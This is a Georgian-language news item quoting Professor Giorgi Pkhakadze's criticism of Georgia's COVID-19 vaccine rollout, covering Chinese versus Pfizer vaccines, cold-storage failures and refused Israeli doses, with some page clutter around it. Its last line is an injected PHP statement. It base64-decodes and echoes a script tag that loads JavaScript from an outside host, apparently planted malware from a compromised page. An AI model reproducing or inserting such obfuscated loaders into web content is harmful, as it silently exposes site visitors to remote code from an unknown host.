celsiusi
ავერსი საქკაბელი
 
პროფესორი, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელი, გიორგი ფხაკაძე მიიჩნევს, რომ აუცილებელია, სხვა ქვეყნების მაგალითები გავითვალისწინოთ.
 
„არ მინდა თქვენი თანამდებობა. ონლაინაც შემიძლია დაგეხმაროთ. ჩვენ გვაქვს ჩინური ვაქცინა. მათ თავისი პლუსი და მინუსი აქვთ. მცირდება სიკვდილიანობა, მაგრამ დელტა ვირუსს ვერ აჩერებს.
 
შესაბამისად, რომ გაქვს ძლიერი ვაქცინები უნდა გადაანაწილო. ევროპა „ფაიზერზე“ და „მოდერნაზე“ გადავიდა. სხვა ქვეყნების გამოცდილება გადმოიტანეთ.
 
ჩამოიტანე ჩინური ვაქცინა და მოსახლეობას ტენი. მომავალი კვირიდან თუ „ქიუარკოდი“ არ გაქვს, საფრანგეთში მატარებელში ვერ ჩაჯდები.
 
რამდენი ინფიცირებული ადამიანი დაბოდიალობს თბილისში, ქუჩაში? წადი ლატვიაში, ესტონეთში, ჩვენი ძმაკაცები არიან. ჩვენი ძმები და დები არიან. უთხარი, გავიჭედე, მიშველე, დამეხმარე.
 
ნუ გამოიგონებთ ახალ სისტემას. არ გვაქვს მაგის თავი. ვერ უყურებთ? „ფაიზერი“ ჩამოიტანეს და სისტემამ გაჭედა. სანამ ფხაკაძემ არ ატეხა ამბავი „ფაიზერს“ წერილი არ გაუგზავნეს.
 
შეგვეძლო ისრაელიდან ფაიზერის მიღება, ისრაელს მორჩა მილიონი დოზა ფაიზერი, რომელსაც ჰქონდა კიდევ 2 თვე ვადა , შეგვეძლო მიგვეღო მათგან თუნდაც 200 ათასი დოზა, უარი თქვეს არ გვინდა ჩვენ გვაქვს ხელშეკრულება და მივიღებთ ფაიზერსო. მე საუბარი მაქვს 200 ათას დოზაზე მეტზე არა, იმიტომ რომ მაცივრები ვერ იყიდეს , მეტი ფაიზერის მიღების და შენახვის პირობები არ აქვთ. . .  ,“ – განაცხადა გიორგი ფხაკაძემ. 
 
2260
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");